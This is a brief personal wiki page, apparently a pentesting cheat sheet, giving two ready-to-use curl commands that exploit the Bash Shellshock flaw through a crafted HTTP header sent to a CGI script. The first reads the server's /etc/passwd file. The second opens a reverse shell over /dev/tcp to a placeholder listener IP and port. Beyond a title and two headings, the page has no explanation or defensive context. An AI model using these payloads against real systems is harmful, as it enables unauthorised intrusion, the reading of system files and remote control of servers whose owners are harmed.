Shellshocker

From Luniwiki
Jump to: navigation, search

Check if vulnerable

curl -v http://example.com/cgi-bin/bashscript.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "

Open a remote shell

curl -v http://example.com/cgi-bin/bashscript.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/<IP_LISTENER>/<PORT_LISTENER> 0>&1 "

References

Daniel Simao 15:19, 3 January 2020 (EST)

Retrieved from "https://wiki.luniel.com/mediawiki/index.php?title=Shellshocker&oldid=4338"